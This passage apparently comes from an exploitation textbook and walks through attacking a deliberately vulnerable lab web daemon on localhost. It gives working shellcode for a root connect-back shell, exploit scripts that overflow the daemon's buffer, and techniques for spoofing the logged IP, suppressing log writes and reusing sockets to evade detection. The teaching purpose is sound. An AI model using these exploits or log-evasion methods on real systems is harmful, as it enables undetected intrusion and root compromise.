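In the output above, a breakpoint is set right before handle_connection() is called, at the call instruction at 0x8048fb2. Then, in another terminal window, the exploit tool is used to throw the new shellcode at the daemon. This advances execution to the breakpoint in the debugging terminal.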

reader@hacking:~/booksrc $ nasm mark_break.s
reader@hacking:~/booksrc $ ./xtool_tinywebd.sh mark_break 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_break (44 bytes)
[NOP (372 bytes)] [shellcode (44 bytes)] [ret addr (128 bytes)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $

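Back in the debugging terminal, the first breakpoint is encountered. Some important stack registers are displayed, which show the stack setup before (and after) the handle_connection() call. Execution then continues to the int3 instruction in the shellcode, which acts like a breakpoint. The same registers are then checked again to view their state at the moment the shellcode begins to execute.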

Breakpoint 1, 0x08048fb2 in main () at tinywebd.c:72
72            handle_connection(new_sockfd, &client_addr, logfd);
(gdb) i r esp ebx ebp
esp            0xbffff7e0       0xbffff7e0
ebx            0xb7fd5ff4       -1208131596
ebp            0xbffff848       0xbffff848
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff753 in ?? ()
(gdb) i r esp ebx ebp
esp            0xbffff7e0       0xbffff7e0
ebx            0x6      6
ebp            0xbffff624       0xbffff624
(gdb)

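This output shows that EBX and EBP have changed by the time the shellcode begins execution. However, an inspection of the instructions in main()'s disassembly shows that EBX is not actually used. The compiler probably saved this register to the stack because of some rule about the calling convention, even though it is not really used. EBP, however, is used heavily, since it is the point of reference for all local stack variables. Because the original saved value of EBP was overwritten by our exploit, the original value must be re-created. Once EBP is restored to its original value, the shellcode should be able to do its dirty work and then return to main() as usual. Since computers are deterministic, the assembly instructions will clearly explain how to do all this.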

(gdb) set dis intel
(gdb) x/5i main
0x8048d93 <main>:       push   ebp
0x8048d94 <main+1>:     mov    ebp,esp
0x8048d96 <main+3>:     sub    esp,0x68
0x8048d99 <main+6>:     and    esp,0xfffffff0
0x8048d9c <main+9>:     mov    eax,0x0
(gdb) x/5i main+533
0x8048fa8 <main+533>:   mov    DWORD PTR [esp+4],eax
0x8048fac <main+537>:   mov    eax,DWORD PTR [ebp-12]
0x8048faf <main+540>:   mov    DWORD PTR [esp],eax
0x8048fb2 <main+543>:   call   0x8048fb9 <handle_connection>
0x8048fb7 <main+548>:   jmp    0x8048f65 <main+466>
(gdb)

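A quick glance at the function prologue for main() shows that EBP should be 0x68 bytes larger than ESP. Since ESP was not damaged by our exploit, we can restore the value of EBP by adding 0x68 to ESP at the end of our shellcode. With EBP restored to the proper value, program execution can be safely returned to the connection-accepting loop. The proper return address for the handle_connection() call is the instruction found after the call, at 0x08048fb7. The following shellcode uses this technique.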

mark_restore.s

BITS 32
; Mark the filesystem to prove you ran.
   jmp short one
   two:
   pop ebx              ; Filename
   xor ecx, ecx
   mov BYTE [ebx+7], cl ; Null terminate filename
   push BYTE 0x5        ; Open()
   pop eax
   mov WORD cx, 0x441   ; O_WRONLY|O_APPEND|O_CREAT
   xor edx, edx
   mov WORD dx, 0x180   ; S_IRUSR|S_IWUSR
   int 0x80             ; Open file to create it.
      ; eax = returned file descriptor
   mov ebx, eax         ; File descriptor to second arg
   push BYTE 0x6        ; Close ()
   pop eax
   int 0x80  ; close file

   lea ebp, [esp+0x68]  ; Restore EBP.
   push 0x08048fb7      ; Return address.
   ret                  ; Return
one:
   call two
db "/HackedX"
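The lea ebp, [esp+0x68] instruction can be sanity-checked against the register values GDB reported at the breakpoint in main(). This is only a sketch using those captured values; the variable names are hypothetical.

```sh
#!/bin/sh
ESP_AT_CALL=0xbffff7e0   # esp at the breakpoint before handle_connection()
EBP_AT_CALL=0xbffff848   # ebp at the same breakpoint (the value to restore)
ESP_IN_SHELLCODE=0xbffff7e0   # esp when the int3 in the shellcode was hit

FRAME_GAP=$(( $EBP_AT_CALL - $ESP_AT_CALL ))        # distance set up by main()'s prologue
RESTORED_EBP=$(( $ESP_IN_SHELLCODE + $FRAME_GAP ))  # what lea ebp,[esp+0x68] computes

printf 'ebp - esp    = 0x%x\n' "$FRAME_GAP"
printf 'restored ebp = 0x%x\n' "$RESTORED_EBP"
```

The gap comes out as 0x68 and the restored value as 0xbffff848, the same EBP that main() had before the call.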

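When assembled and used in an exploit, this shellcode restores the tinyweb daemon's execution after marking the filesystem. The tinyweb daemon does not even know that something happened.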

reader@hacking:~/booksrc $ nasm mark_restore.s
reader@hacking:~/booksrc $ hexdump -C mark_restore
00000000  eb 26 5b 31 c9 88 4b 07  6a 05 58 66 b9 41 04 31  |.&[1.K.j.Xf.A.1|
00000010  d2 66 ba 80 01 cd 80 89  c3 6a 06 58 cd 80 8d 6c  |.f....j.X..l|
00000020  24 68 68 b7 8f 04 08 c3  e8 d5 ff ff ff 2f 48 61  |$hh...../Ha|
00000030  63 6b 65 64 58                                    |ckedX|
00000035
reader@hacking:~/booksrc $ sudo rm /Hacked
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ./xtool_tinywebd_stealth.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (348 b)] [shellcode (53 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-19 20:37 /Hacked
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root     26787  0.0  0.0   1636   420 ?        Ss   20:37   0:00 ./tinywebd
reader   26828  0.0  0.0   2880   748 pts/1    R+   20:38   0:00 grep tinywebd
reader@hacking:~/booksrc $ ./webserver_id 127.0.0.1
The web server for 127.0.0.1 is Tiny webserver
reader@hacking:~/booksrc $

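Child Laborers

Now that the difficult part is figured out, we can use this technique to silently spawn a root shell. Since the shell is interactive, but we still want the process to handle web requests, we need to fork to a child process. The fork() call creates a child process that is an exact copy of the parent, except that it returns 0 in the child process and the new process ID in the parent process. We want our shellcode to fork, with the child process serving up the root shell while the parent process restores tinywebd's execution. In the shellcode below, several instructions are added to the start of loopback_shell.s. First, the fork syscall is made, and the return value is put in the EAX register. The next few instructions test whether EAX is zero. If EAX is zero, we jump to child_process to spawn the shell. Otherwise, we are in the parent process, so the shellcode restores execution into tinywebd.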

loopback_shell_restore.s

BITS 32

   push BYTE 0x02    ; Fork is syscall #2
   pop eax
   int 0x80          ; After the fork, in child process eax == 0.
   test eax, eax
   jz child_process  ; In child process spawns a shell.

; In the parent process, restore tinywebd.
   lea ebp, [esp+0x68]  ; Restore EBP.
   push 0x08048fb7      ; Return address.
   ret                  ; Return

child_process:
; s = socket(2, 1, 0)
  push BYTE 0x66    ; Socketcall is syscall #102 (0x66)
  pop eax
  cdq               ; Zero out edx for use as a null DWORD later.
  xor ebx, ebx      ; ebx is the type of socketcall.
  inc ebx           ; 1 = SYS_SOCKET = socket()
  push edx          ; Build arg array: { protocol = 0,
  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
  push BYTE 0x2     ;                    AF_INET = 2 }
  mov ecx, esp      ; ecx = ptr to argument array
  int 0x80          ; After syscall, eax has socket file descriptor.
 .: [ Output trimmed; the rest is the same as loopback_shell.s. ] :.
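The parent/child split that this shellcode relies on can be illustrated at the shell level. This is only a rough analogy, not the shellcode itself: the & operator makes the shell fork, the subshell plays the role of the child, and the function name and messages are hypothetical.

```sh
#!/bin/sh
serve_and_spawn() {
   out=$(mktemp)                                        # scratch file for the child's report
   ( echo "child: handling the side task" > "$out" ) &  # the shell forks; the subshell is the child
   child_pid=$!                                         # parent sees the child's process ID
   echo "parent: still serving requests"                # parent carries on immediately
   wait "$child_pid"                                    # reap the child before reading its report
   cat "$out"
   rm -f "$out"
}

serve_and_spawn
```

The parent prints its line without waiting for the child to finish its work, which is the same division of labor the shellcode sets up between tinywebd and the spawned shell.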

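The following listing shows this shellcode in use. Multiple jobs are used instead of multiple terminals, so the netcat listener is sent to the background by ending the command with an ampersand (&). After the shell connects back, the fg command brings the listener back to the foreground. The process is then suspended by pressing CTRL-Z, which returns to the BASH shell. It might be easier to use multiple terminals as you follow along, but job control is useful to know for those times when you do not have the luxury of multiple terminals.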

reader@hacking:~/booksrc $ nasm loopback_shell_restore.s
reader@hacking:~/booksrc $ hexdump -C loopback_shell_restore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X..t.l$hh.|
00000010  04 08 c3 6a 66 58 99 31  db 43 52 6a 01 6a 02 89  |..jfX.1.CRj.j.|
00000020  e1 cd 80 96 6a 66 58 43  68 7f bb bb 01 66 89 54  |..jfXCh..f.T|
00000030  24 01 66 68 7a 69 66 53  89 e1 6a 10 51 56 89 e1  |$.fhzifS.j.QV.|
00000040  43 cd 80 87 f3 87 ce 49  b0 3f cd 80 49 79 f9 b0  |C...I.?.Iy.|
00000050  0b 52 68 2f 2f 73 68 68  2f 62 69 6e 89 e3 52 89  |.Rh//shh/bin.R.|
00000060  e2 53 89 e1 cd 80                                 |.S..|
00000066
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 27279
reader@hacking:~/booksrc $ ./xtool_tinywebd_stealth.sh loopback_shell_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell_restore (102 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (299 b)] [shellcode (102 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

[1]+  Stopped                 nc -l -p 31337
reader@hacking:~/booksrc $ ./webserver_id 127.0.0.1
The web server for 127.0.0.1 is Tiny webserver
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

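With this shellcode, the connect-back root shell is maintained by a separate child process, while the parent process continues to serve web content.

Advanced Camouflage

Our current stealth exploit only camouflages the web request; the IP address and timestamp are still written to the log file. This type of camouflage makes the attacks harder to find, but they are not invisible. Having your IP address written to logs that could be kept for years might lead to trouble in the future. Since we are now mucking around with the insides of the tinyweb daemon, we should be able to hide our presence even better.

Spoofing the Logged IP Address

The IP address written to the log file comes from client_addr_ptr, which is passed to handle_connection().

Code Segment from tinywebd.c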

void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
   unsigned char *ptr, request[500], resource[500], log_buffer[500];
   int fd, length;

   length = recv_line(sockfd, request);

   sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr),
           ntohs(client_addr_ptr->sin_port), request);

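To spoof the IP address, we just need to inject our own sockaddr_in structure and overwrite client_addr_ptr with the address of the injected structure. The best way to generate a sockaddr_in structure for injection is to write a little C program that creates and dumps the structure. The following source code builds the struct using command-line arguments and then writes the struct data directly to file descriptor 1, which is standard output.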

addr_struct.c

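#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>      // write()
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   // inet_addr()

int main(int argc, char *argv[]) {
   struct sockaddr_in addr;
   if(argc != 3) {
      printf("Usage: %s <target IP> <target port>\n", argv[0]);
      exit(0);
   }
   addr.sin_family = AF_INET;
   addr.sin_port = htons(atoi(argv[2]));       // Port in network byte order
   addr.sin_addr.s_addr = inet_addr(argv[1]);  // IP address in network byte order

   // Dump the raw struct to file descriptor 1 (standard output).
   write(1, &addr, sizeof(struct sockaddr_in));
   return 0;
}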

This program can be used to inject a sockaddr_in structure. The output below shows the program being compiled and executed.

reader@hacking:~/booksrc $ gcc -o addr_struct addr_struct.c
reader@hacking:~/booksrc $ ./addr_struct 12.34.56.78 9090
##
   "8N_reader@hacking:~/booksrc $
reader@hacking:~/booksrc $ ./addr_struct 12.34.56.78 9090 | hexdump -C
00000000  02 00 23 82 0c 22 38 4e  00 00 00 00 f4 5f fd b7  |.#."8N..._.|
00000010
reader@hacking:~/booksrc $
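The port and address bytes in the hexdump above can be reproduced by hand, which makes it easier to see which part of the dump is which. The helper names below are hypothetical, and the sketch only handles octets without leading zeros.

```sh
#!/bin/sh
# Port number as two hex bytes in network (big-endian) byte order.
port_bytes() {
   printf '%02x %02x\n' $(( ($1 >> 8) & 0xff )) $(( $1 & 0xff ))
}

# Dotted-quad IPv4 address as four hex bytes, in the order they are written.
ip_bytes() {
   old_ifs=$IFS
   IFS=.
   set -- $1          # split the address on dots into $1..$4
   IFS=$old_ifs
   printf '%02x %02x %02x %02x\n' "$1" "$2" "$3" "$4"
}

port_bytes 9090
ip_bytes 12.34.56.78
```

This prints 23 82 and 0c 22 38 4e, which are the bytes that follow the two-byte address family (02 00) at the start of the dump.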

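To integrate this into our exploit, the address structure is injected after the fake request but before the NOP sled. Since the fake request is 15 bytes long and we know the buffer starts at 0xbffff5c0, the fake address structure will be injected at 0xbffff5cf.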

reader@hacking:~/booksrc $ grep 0x xtool_tinywebd_stealth.sh
RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0
reader@hacking:~/booksrc $ gdb -q -batch -ex "p /x 0xbffff5c0 + 15"
$1 = 0xbffff5cf
reader@hacking:~/booksrc $

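Since client_addr_ptr is passed as the second function argument, it will be on the stack two dwords after the return address. The following exploit script injects a fake address structure and overwrites client_addr_ptr.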

xtool_tinywebd_spoof.sh

#!/bin/sh
# IP spoofing stealth exploitation tool for tinywebd

SPOOFIP="12.34.56.78"
SPOOFPORT="9090"

if [ -z "$2" ]; then # If argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16))

echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE] [ret addr 128] [*fake_addr 8]"
(perl -e "print \"$FAKEREQUEST\"";
 ./addr_struct "$SPOOFIP" "$SPOOFPORT";
 perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\r\n\"") | nc -w 1 -v $2 80

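The best way to explain exactly what this exploit script does is to watch tinywebd from within GDB. In the output below, GDB is attached to the running tinywebd process, and breakpoints are set before the overflow and after the IP portion of the log buffer has been generated.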

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root     27264  0.0  0.0   1636   420 ?        Ss   20:47   0:00 ./tinywebd
reader   30648  0.0  0.0   2880   748 pts/2    R+   22:29   0:00 grep tinywebd
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q --pid=27264 --symbols=./a.out

warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Attaching to process 27264
/cow/home/reader/booksrc/tinywebd: No such file or directory.
A program is being debugged already. Kill it? (y or n) n
Program not killed.
(gdb) list handle_connection
77      /* This function handles the connection on the passed socket from the
78       * passed client address and logs to the passed FD. The connection is
79       * processed as a web request, and this function replies over the connected
80       * socket. Finally, the passed socket is closed at the end of the function.
81       */
82      void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd)
 {
83         unsigned char *ptr, request[500], resource[500], log_buffer[500];
84         int fd, length;
85
86         length = recv_line(sockfd, request);
(gdb)
87
88         sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr),
ntohs(client_addr_ptr->sin_port), request);
89
90         ptr = strstr(request, " HTTP/"); // Search for valid looking request.
91         if(ptr == NULL) { // Then this isn't valid HTTP
92            strcat(log_buffer, " NOT HTTP!\n");
93         } else {
94            *ptr = 0; // Terminate the buffer at the end of the URL.
95            ptr = NULL; // Set ptr to NULL (used to flag for an invalid request).
96            if(strncmp(request, "GET ", 4) == 0)  // Get request
(gdb) break 86
Breakpoint 1 at 0x8048fc3: file tinywebd.c, line 86.
(gdb) break 89
Breakpoint 2 at 0x8049028: file tinywebd.c, line 89.
(gdb) cont
Continuing.

Then, from another terminal, the new spoofing exploit is used to advance execution in the debugger.

reader@hacking:~/booksrc $ ./xtool_tinywebd_spoof.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 332] [shellcode 53] [ret addr 128]
[*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $

Back in the debugging terminal, the first breakpoint is hit.

Breakpoint 1, handle_connection (sockfd=9, client_addr_ptr=0xbffff810, logfd=3) at
tinywebd.c:86
86         length = recv_line(sockfd, request);
(gdb) bt
#0  handle_connection (sockfd=9, client_addr_ptr=0xbffff810, logfd=3) at tinywebd.c:86
#1  0x08048fb7 in main () at tinywebd.c:72
(gdb) print client_addr_ptr
$1 = (struct sockaddr_in *) 0xbffff810
(gdb) print *client_addr_ptr
$2 = {sin_family = 2, sin_port = 15284, sin_addr = {s_addr = 16777343},
sin_zero = "\000\000\000\000\000\000\000"}
(gdb) x/x &client_addr_ptr
0xbffff7e4:     0xbffff810
(gdb) x/24x request + 500
0xbffff7b4:     0xbffff624      0xbffff624      0xbffff624      0xbffff624
0xbffff7c4:     0xbffff624      0xbffff624      0x0804b030      0xbffff624
0xbffff7d4:     0x00000009      0xbffff848      0x08048fb7      0x00000009
0xbffff7e4:     0xbffff810      0x00000003      0xbffff838      0x00000004
0xbffff7f4:     0x00000000      0x00000000      0x08048a30      0x00000000
0xbffff804:     0x0804a8c0      0xbffff818      0x00000010      0x3bb40002
(gdb) cont
Continuing.

Breakpoint 2, handle_connection (sockfd=-1073744433, client_addr_ptr=0xbffff5cf, 
logfd=2560)
at tinywebd.c:90
90         ptr = strstr(request, " HTTP/"); // Search for valid-looking request.
(gdb) x/24x request + 500
0xbffff7b4:     0xbffff624      0xbffff624      0xbffff624      0xbffff624
0xbffff7c4:     0xbffff624      0xbffff624      0xbffff624      0xbffff624
0xbffff7d4:     0xbffff624      0xbffff624      0xbffff624      0xbffff5cf
0xbffff7e4:     0xbffff5cf      0x00000a00      0xbffff838      0x00000004
0xbffff7f4:     0x00000000      0x00000000      0x08048a30      0x00000000
0xbffff804:     0x0804a8c0      0xbffff818      0x00000010      0x3bb40002
(gdb) print client_addr_ptr
$3 = (struct sockaddr_in *) 0xbffff5cf
(gdb) print client_addr_ptr
$4 = (struct sockaddr_in *) 0xbffff5cf
(gdb) print *client_addr_ptr
$5 = {sin_family = 2, sin_port = 33315, sin_addr = {s_addr = 1312301580},
sin_zero = "\000\000\000\000_
(gdb) x/s log_buffer
0xbffff1c0:      "From 12.34.56.78:9090 \"GET / HTTP/1.1\"\t"
(gdb)

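At the first breakpoint, client_addr_ptr is shown to be at 0xbffff7e4 and pointing to 0xbffff810. This is found in memory on the stack two dwords after the return address. The second breakpoint is after the overwrite, so client_addr_ptr at 0xbffff7e4 is shown to be overwritten with the address of the injected sockaddr_in structure at 0xbffff5cf. From here, we can peek at log_buffer before it is written out to the log to verify that the address injection worked.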

Logless Exploitation

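Ideally, we want to leave no trace at all. In the setup on the LiveCD, technically you can just delete the log files after you get a root shell. However, let's assume this program is part of a secure infrastructure where the log files are mirrored to a secure logging server that has minimal access, or maybe even to a line printer. In these cases, deleting the log files after the fact is not an option. The timestamp() function in the tinyweb daemon tries to be secure by writing directly to an open file descriptor. We can't stop this function from being called, and we can't undo the write it does to the log file. This would be a fairly effective countermeasure; however, it was implemented poorly. In fact, in the previous exploit, we stumbled upon this problem.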

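Even though logfd is a global variable, it is also passed to handle_connection() as a function argument. From the discussion of functional context, you should remember that this creates another stack variable with the same name, logfd. Since this argument sits on the stack right after client_addr_ptr, it gets partially overwritten by the null terminator and the extra 0x0a byte found at the end of the exploit buffer.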

(gdb) x/xw &client_addr_ptr
0xbffff7e4:     0xbffff5cf
(gdb) x/xw &logfd
0xbffff7e8:     0x00000a00
(gdb) x/4xb &logfd
0xbffff7e8:     0x00    0x0a    0x00    0x00
(gdb) x/8xb &client_addr_ptr
0xbffff7e4:     0xcf    0xf5    0xff    0xbf    0x00    0x0a    0x00    0x00
(gdb) p logfd
$6 = 2560
(gdb) quit
The program is running.  Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 27264
reader@hacking:~/booksrc $ sudo kill 27264
reader@hacking:~/booksrc $

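The effect is easy to explore with strace. In the output below, strace is attached to a running process with the -p command-line argument. The -e trace=write argument tells strace to show only write calls. Once again, the spoofing exploit tool is used from another terminal to connect and advance execution.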

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root       478  0.0  0.0   1636   420 ?        Ss   23:24   0:00 ./tinywebd
reader     525  0.0  0.0   2880   748 pts/1    R+   23:24   0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(2560, "09/19/2007 23:29:30> ", 21) = -1 EBADF (Bad file descriptor)
write(2560, "From 12.34.56.78:9090 \"GET / HTT".., 47) = -1 EBADF (Bad file descriptor)
Process 478 detached
reader@hacking:~/booksrc $

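This output clearly shows the attempts to write to the log file failing. Normally, we wouldn't be able to overwrite the logfd variable, since client_addr_ptr is in the way. Carelessly mangling this pointer will usually lead to a crash. But since we've made sure this variable points to valid memory (our injected fake address structure), we're free to overwrite the variables that lie beyond it. Since the tinyweb daemon redirects standard output to /dev/null, the next exploit script overwrites the passed logfd variable with 1, for standard output. This still prevents entries from being written to the log file, but in a much nicer way: without errors.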

xtool_tinywebd_silent.sh

#!/bin/sh
# Silent stealth exploitation tool for tinywebd
#    also spoofs IP address stored in memory

SPOOFIP="12.34.56.78"
SPOOFPORT="9090"

if [ -z "$2" ]; then # If argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16))

echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE] [ret addr 128] [*fake_addr 8]"
(perl -e "print \"$FAKEREQUEST\"";
 ./addr_struct "$SPOOFIP" "$SPOOFPORT";
 perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\x01\x00\x00\x00\r\n\"") | nc -w 1 -v $2 80

When this script is used, the exploit is totally silent and nothing is written to the log file.

reader@hacking:~/booksrc $ sudo rm /Hacked
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon..
reader@hacking:~/booksrc $ ls -l /var/log/tinywebd.log
-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd.log
reader@hacking:~/booksrc $ ./xtool_tinywebd_silent.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 332] [shellcode 53] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /var/log/tinywebd.log
-rw------- 1 root reader 6526 2007-09-19 23:24 /var/log/tinywebd.log
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-19 23:35 /Hacked
reader@hacking:~/booksrc $

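Notice that the log file's size and timestamp remain the same. Using this technique, we can exploit tinywebd without leaving any trace in the log files. In addition, the write calls execute cleanly, since everything is written to /dev/null. This is shown by strace in the output below, captured while the silent exploit tool is run from another terminal.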

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root       478  0.0 0.0    1636   420 ?        Ss   23:24   0:00 ./tinywebd
reader    1005  0.0 0.0    2880   748 pts/1    R+   23:36   0:00 grep tinywebd
reader@hacking:~/booksrc $ sudo strace -p 478 -e trace=write
Process 478 attached - interrupt to quit
write(1, "09/19/2007 23:36:31> ", 21)   = 21
write(1, "From 12.34.56.78:9090 \"GET / HTT".., 47) = 47
Process 478 detached
reader@hacking:~/booksrc $

The Whole Infrastructure

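As always, details can be hidden in the bigger picture. A single host usually exists within some sort of infrastructure. Countermeasures such as intrusion detection systems (IDS) and intrusion prevention systems (IPS) can detect abnormal network traffic. Even simple log files on routers and firewalls can reveal abnormal connections that are indicative of an intrusion. In particular, the connection to port 31337 used by our connect-back shellcode is a big red flag. We could change the port to something that looks less suspicious; however, simply having a web server open outbound connections could be a red flag by itself. A highly secure infrastructure might even have the firewall set up with egress filters to prevent outbound connections. In these situations, opening a new connection is either impossible or will be detected.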

Socket Reuse

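In our case, there's really no need to open a new connection, since we already have an open socket from the web request. Since we're mucking around inside the tinyweb daemon, with a little debugging we can reuse the existing socket for the root shell. This prevents additional TCP connections from being logged and allows exploitation in cases where the target host cannot open outbound connections. Take a look at the source code from tinywebd.c shown below.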

Excerpt from tinywebd.c

   while(1) { // Accept loop
      sin_size = sizeof(struct sockaddr_in);
      new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
      if(new_sockfd == -1)
         fatal("accepting connection");

      handle_connection(new_sockfd, &client_addr, logfd);
   }
   return 0;
}

/* This function handles the connection on the passed socket from the
 * passed client address and logs to the passed FD. The connection is
 * processed as a web request, and this function replies over the connected
 * socket. Finally, the passed socket is closed at the end of the function.
 */
void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
   unsigned char *ptr, request[500], resource[500], log_buffer[500];
   int fd, length;

   length = recv_line(sockfd, request);

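Unfortunately, the sockfd passed to handle_connection() will inevitably be overwritten so that we can overwrite logfd. This overwrite happens before we gain control of the program in the shellcode, so there's no way to recover the previous value of sockfd. Luckily, main() keeps another copy of the socket's file descriptor in new_sockfd.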

reader@hacking:~/booksrc $ ps aux | grep tinywebd
root       478  0.0  0.0   1636   420 ?        Ss   23:24   0:00 ./tinywebd
reader    1284  0.0  0.0   2880   748 pts/1    R+   23:42   0:00 grep tinywebd
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q --pid=478 --symbols=./a.out
warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Attaching to process 478
/cow/home/reader/booksrc/tinywebd: No such file or directory.
A program is being debugged already. Kill it? (y or n) n
Program not killed.
(gdb) list handle_connection
77      /* This function handles the connection on the passed socket from the
78       * passed client address and logs to the passed FD. The connection is
79       * processed as a web request, and this function replies over the connected
80       * socket. Finally, the passed socket is closed at the end of the function.
81       */
82      void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd)
 {
83         unsigned char *ptr, request[500], resource[500], log_buffer[500];
84         int fd, length;
85
86         length = recv_line(sockfd, request);
(gdb) break 86
Breakpoint 1 at 0x8048fc3: file tinywebd.c, line 86.
(gdb) cont
Continuing.

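After the breakpoint is set and the program continues, the silent exploit tool is used from another terminal to connect and advance execution.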

Breakpoint 1, handle_connection (sockfd=13, client_addr_ptr=0xbffff810, logfd=3) at
tinywebd.c:86
86         length = recv_line(sockfd, request);
(gdb) x/x &sockfd
0xbffff7e0:     0x0000000d
(gdb) x/x &new_sockfd
No symbol "new_sockfd" in current context.
(gdb) bt
#0  handle_connection (sockfd=13, client_addr_ptr=0xbffff810, logfd=3) at tinywebd.c:86
#1  0x08048fb7 in main () at tinywebd.c:72
(gdb) select-frame 1
(gdb) x/x &new_sockfd
0xbffff83c:     0x0000000d
(gdb) quit
The program is running.  Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 478
reader@hacking:~/booksrc $

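This debugging output shows that new_sockfd is stored at 0xbffff83c within main's stack frame. Using this, we can create shellcode that uses the socket file descriptor stored here instead of creating a new connection.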

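While we could just use this address directly, there are many little things that can shift stack memory around. If that happens and the shellcode is using a hardcoded stack address, the exploit will fail. To make the shellcode more reliable, take a cue from how the compiler handles stack variables. If we use an address relative to ESP, then even if the stack shifts around a bit, the address of new_sockfd will still be correct, since the offset from ESP will be the same. As you may remember from debugging with the mark_break shellcode, ESP was 0xbffff7e0. Using this value for ESP, the offset is shown to be 0x5c bytes.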

reader@hacking:~/booksrc $ gdb -q
(gdb) print /x 0xbffff83c - 0xbffff7e0
$1 = 0x5c
(gdb)

The following shellcode reuses the existing socket for the root shell.

socket_reuse_restore.s

BITS 32

   push BYTE 0x02    ; Fork is syscall #2
   pop eax
   int 0x80          ; After the fork, in child process eax == 0.
   test eax, eax
   jz child_process  ; In child process spawns a shell.

      ; In the parent process, restore tinywebd.
   lea ebp, [esp+0x68]  ; Restore EBP.
   push 0x08048fb7      ; Return address.
   ret                  ; Return.

child_process:
      ; Re-use existing socket.
